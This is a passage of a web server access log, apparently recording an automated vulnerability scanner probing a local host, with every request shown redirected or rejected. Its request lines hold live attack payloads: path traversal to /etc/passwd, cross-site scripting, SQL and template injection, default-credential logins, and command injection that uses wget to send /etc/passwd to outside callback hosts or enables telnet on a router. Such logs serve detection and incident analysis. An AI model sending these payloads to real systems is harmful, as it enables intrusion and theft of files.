AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.318","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?class=../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.320","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /app.yaml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.478","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /clansphere/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&module=module HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.242","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /https://%5Ctexample.com/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.438","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///etc.json?FNZ.ico HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.422","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /search?search_key=%7B%7B1337*1338%7D%7D HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.426","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.feed HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.349","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /document.php?modulepart=project&file=../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.420","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.min.css HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.351","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-mail-smtp-pro/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.458","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.450","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20c9oms3gsmpve1ijt0mc0uftweeioixfce.oast.live) HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.451","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /.%00./.%00./etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"","request":"GET / HTTP/1.0","status":"400","body_bytes_sents":"154","req_time":"0.003","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /horizon/auth/login/?next=/horizon/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.446","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v1/canal/config/1/1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.373","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"j_username=admin&j_password=admin&continue=&submit=submit+form","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /0/Authenticate HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.339","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /interlib/report/ShowImage?localPath=C:\x5CWindows\x5Csystem.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.430","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/72 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.432","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.455","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?g=g&m=Door&a=index&content=alert(\x2228fHqPtZ777gOWUgtViUmbQCkgp\x22)b7g0x=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.346","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /rest/v1/AccountService/Accounts HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.249","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.296","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:24 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v3/graphql-explorer HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.356","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.256","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.282","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /status.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.080","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.270","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword=\x22onmouseover=alert(document.domain)/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.360","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /dump.sql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.360","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /webclient/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.273","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"--8ce4b16b22b58894aa86c421e8759df3\x0D\x0AContent-Disposition: form-data; name=\x22jarfile\x22;filename=\x22poc.jar\x22\x0D\x0AContent-Type:application/octet-stream\x0D\x0A\x0D\x0A 28fHqSsltV1bxnfQD7rl6NguuLx\x0D\x0A--8ce4b16b22b58894aa86c421e8759df3--\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /jars/upload HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.373","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.306","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /tool/view/phpinfo.view.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.283","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /him/api/rest/V1.0/system/log/list?filePath=../ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.326","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A http://c9oms3gsmpve1ijt0mc0x6mjk3j8renpj.oast.live\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.338","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /images/..%2finfo.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.176","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /html/login.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.397","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v3/graphql.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.399","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str(98989*44313),null HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.361","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /errors/errors.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.762","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /glpi/status.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.382","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=cf7skins&tab=%27%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.410","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.408","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.307","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+547653*865674+as+id HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.284","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=mlw_quiz_list&s=\x22>&paged=\x22> HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.304","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"http:","request":"GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.302","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.392","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /PMUser/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.409","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /carbon/admin/login.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.409","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.688","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///etc.children....4.2.1....json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.822","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v3/graphql/console HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.300","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://c9oms3gsmpve1ijt0mc085djzch456f4b.oast.live&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /goform/setmac HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.321","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/index.htmlr", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"action=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode(\x22R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\x22))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /images/..%2fapply_abstract.cgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.431","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"POST", "http_x_forwarded_for":"-"} 